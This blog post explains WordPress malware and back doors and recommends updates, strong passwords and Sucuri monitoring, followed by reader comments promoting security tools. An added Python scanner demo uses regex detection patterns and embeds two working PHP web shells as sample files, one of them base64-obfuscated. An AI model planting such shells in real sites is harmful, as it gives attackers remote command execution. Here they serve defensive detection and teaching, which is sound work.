Do any of the following scenarios sound familiar to you? If so, I think we can eliminate the fear and maybe even the entire spectacle!
“1. My readers have let me know that when they click on linkhere.com they get a message saying I have a virus. What can I do?”
“2. [I've sent them a notice that our monitoring partner has alerted us to a problem and we're dealing with it.] What’s wrong? Does this mean I have a virus?!?!”
“3. Google has blasted my site with the big red warning screen – I’m panicking!! What do I do?”
“4. How can this happen!?!?”
WordPress Security vs. The Bad Guys
Imagine a huge plate of spaghetti noodles piled high on a serving platter. For our illustration that will represent the internet.
“Malware” is simply any malicious code that does harm to your particular noodle: it may inject spam links, redirect your readers, serve them a virus, or quietly host files for someone else.
Malware is not looking for your noodle in particular. It is simply looking for any website, on any computer, that might have left the door open a crack (an old plugin, a weak password) for it to get in and do damage. And you’re right, there are no doors in noodles. The analogy breaks down a bit here.
My point is that it isn’t personal – this is not a targeted attack destined to do you damage, although it can feel like it.
Is WordPress Secure?
In other words, is it WordPress’s fault that you have had this trouble?
Let me pose a hypothetical question: What are the chances of my reputation being ruined by a past indiscretion?
The answer is: not much! And not because I’ve been angelic, but because no one cares!
What about the Prime Minister? (er… or President, I think you call him.) More people care about his reputation, than they do about mine so I’ve been told.
To summarize, if you are popular more people care and somehow find it entertaining or challenging to find juicy bits. The same is true for WordPress – it is insanely popular. So there are those silly people who find it somehow entertaining to challenge the security of it.
On the flip side, because it is so huge, and because WordPress is open source, it’s backed by hundreds of developers and thousands of contributors all making it better and more secure by the day.
Literally, by the day. It’s mind-boggling.
So is it secure? I see it like a race. Just as fast as the evil minions come up with new malware, the WordPress project patches the holes they use. No software is impenetrable, but I’m betting on WordPress, kept up to date, plus a few best practices.
Don’t stop reading now!
Back Doors: escaping unscathed
Have you seen the movies with the teenage boy climbing out the top floor window of his girlfriend’s bedroom? It’s dark. A twig snaps. Shortly after, Daddy comes out the front door with a shotgun. We root for the fellow to escape unharmed and true love to prevail. I always picture this scenario when talking about back doors. Except we’re not letting an unsung hero escape our bedroom window, we’re letting a virus out and leaving an opening for him to come back later.
Back doors are the pieces of code an attacker leaves behind so the malware can come back later: a rogue PHP file dropped somewhere in your site, or a few obfuscated lines injected into a theme or plugin file. If you only remove the visible infection, they will simply reinfect you next week. It’s essential you get these out of your website too.
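To make “pieces of code that leave little holes” concrete, here is a small triage scanner. It is an added example, not code from this post or from Sucuri, and the signatures, file names and sample files in it are my own constructed assumptions. It walks a WordPress tree and flags the patterns attackers typically leave behind: `eval()` of a decoded payload, `preg_replace()` with the code-executing `/e` modifier, shell commands fed straight from a request parameter, and PHP files sitting in `wp-content/uploads` (which should only ever hold media).

```python
"""Heuristic back-door triage scanner for a WordPress tree.

Added example (not code from the original post). Every hit is something
to inspect by hand, not proof of infection; obfuscation varies, so a
clean report does not prove a clean site either.
"""
import os
import re
import tempfile

# Signatures commonly seen in injected PHP back doors (heuristics, assumed here).
SIGNATURES = {
    # eval() of a decoded/decompressed blob: the classic injected payload
    "eval_decode": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # preg_replace with the /e modifier executes the replacement as PHP
    "preg_replace_e": re.compile(
        r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I),
    # a variable used as a function name, called on raw request input
    "dynamic_call": re.compile(
        r"\$[A-Za-z_]\w*\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    # shell/eval-style builtins fed directly from a request parameter
    "request_exec": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|assert)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    # very long base64 literals are a strong hint of a packed payload
    "long_base64": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}

PHP_EXTENSIONS = (".php", ".phtml", ".php5")


def scan_php_source(text):
    """Return [(signature_name, line_number), ...] for every hit in one file's text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in SIGNATURES.items():
            if rx.search(line):
                hits.append((name, lineno))
    return hits


def scan_tree(root):
    """Walk a WordPress install; return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fname)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            # Rule 1: executable code has no business living under uploads/.
            if rel.startswith("wp-content/uploads/"):
                findings.append((rel, "php file in uploads directory"))
            # Rule 2: content signatures, reported with the offending line.
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            for name, lineno in scan_php_source(text):
                findings.append((rel, f"{name} at line {lineno}"))
    return sorted(findings)


# Constructed sample site: one clean plugin, one injected theme footer,
# one dropped shell in uploads. These are made-up files for the demo.
SAMPLE_FILES = {
    "wp-content/plugins/demo/demo.php":
        "<?php\nfunction demo_shortcode() { return esc_html('hello'); }\n"
        "add_shortcode('demo', 'demo_shortcode');\n",
    "wp-content/themes/demo/footer.php":
        "<?php wp_footer(); ?>\n</body>\n"
        "<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydjJ10pKXtzeXN0ZW0oJF9QT1NUWydjJ10pO30=')); ?>\n",
    "wp-content/uploads/2013/01/wp-cache.php":
        "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>\n",
}


def write_sample_tree(root):
    """Materialise SAMPLE_FILES under root."""
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the sample tree in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as root:
        write_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Run it against a real install with `scan_tree("/var/www/html")` (path assumed). Treat the report as a to-do list for manual inspection, and pair it with the stronger check the signatures cannot give you: diff core, plugin and theme files against fresh copies downloaded from wordpress.org, since a back door can also be a single added line in an otherwise legitimate file.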
Best Practices for WordPress Security
Items for your geeky brother/sister/husband/wife: Make sure your computer is secure (use up-to-date anti-virus software; a keylogger on your PC hands over every password you type). Make sure your network is secure (use a firewall).
Items for you: Passwords need to be changed, and the new ones need to be random: admin users, FTP users, MySQL users. Change every one of them after a clean-up, otherwise whoever got in still has the keys.
Make sure all your passwords are randomly generated and unique to each account, and keep them in a password manager rather than in your head.
SB: You know that I have over 1,000 passwords that you’ve given me, right? When ‘they’ say that people use passwords like their names, children’s names, birthdays, and words like “adm1n” and “passw0rd” they are RIGHT!
Items you might want help with: Make sure your WordPress core, plugins, and themes are all updated and from reputable sources (use as few plugins as possible; every one you don’t need is one more door to keep locked). See our WordPress Upgrade Page for details.
78% of malware cases can be attributed to an outdated WordPress core or outdated plugins/modules! (source)
#1 Tip for WordPress Security
Get your website onto Sucuri’s automatic scanners. They clean out and harden sites. Install the server-side monitoring and the WordPress plugin that appears in the dashboard after logging in. Proudly display the ‘secured by Sucuri’ badge in your footer to increase reader confidence.
I used to charge by the hour to manually clean out sites. This can be an arduous process and an unexpected $200 – $300 bill! Sucuri’s annual (yes, annual) charge of $90 is a STEAL.
Further reading:
- the Codex
- Sucuri Blog
Great post, I’m glad there are people blogging about Malware and Injections through WordPress in order to get the word out. WordPress, out of the box, really isn’t secure. However that doesn’t mean that you shouldn’t be using it.
I personally love building in WordPress because of the amount of people we can reach with our services, like many others. WordPress is a huge community – however with that being said there are a large percentage of users that unfortunately do not have any security or know what to do when being attacked.
Sucuri is great for cleaning out malware and infectious servers. $90 is very inexpensive once you’re infected; however, just the pain of having to deal with hiring someone can be nerve-wracking.
We’ve come out with (about to launch in a day) a great WordPress Security plugin that can prevent a lot of hackers and bots from taking over someone’s site. We all know there are many preventative measures that we can take to protect our sites, but many users simply don’t know or can’t afford to hire someone to do this for them.
Being able to change your database table prefix on the fly, change your admin username, create a custom login URL (that disables the default wp-admin & wp-login.php URLs), enable HTTP Authentication and so much more.
You can get more info at http:// lockerpress.com
Thank you for your comment! The link has been removed, but we can copy/paste it! I’ll look into your lockerpress plugin – sounds good!
Great post… and a good list of things to do to secure your wordpress…
We had some issues ourselves on our sites, and in the end we compiled an extensive checklist of items you need to do to secure your wordpress site…
It should be good for relatively non-technical wordpress users too…
And it can be downloaded for free from our site http://www. wpsecuritychecklist.com
Maybe your readers can benefit from the checklist too…
Thank you for the checklist – I’ll definitely check that out!
I have WP site owners come to us frequently. As your source states, most of these are due to outdated WP installations.
A major issue is plugins. I have seen several plugins that include other code. While the plugin author may update their code, they do not update the included code. This was certainly the case with the Timthumb hack (http://www. wpbeginner .com /wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/).
One tip I offer here (http: //www.rackaid .com/ resources/wordpress-tips/) is to pick popular plugins that are updated regularly. Don’t use obscure plugins that do not have regular updates. Doing this and keeping your WP up to date will save a lot of trouble.
If you have multiple WP installs, check out http:// www. managewp.com/
Lastly, I am experimenting with WPScan – a WP specific security scanner – and will post results to our blog.
I think:
- Running WP under mod_ruid, fast-cgi, SuPHP to assure the WP install runs under the user ID
- Using good passwords
- Keeping things updated
- WPscans regularly or after any plugin/coding/theme changes
- W3TC for performance
This list really lays a great foundation for operating WP.
Thank you – the additional things – wpscans (we use managewp for all our clients, and Sucuri has a server side plugin that I recommend now). The links have been removed, but we’ll copy/paste them!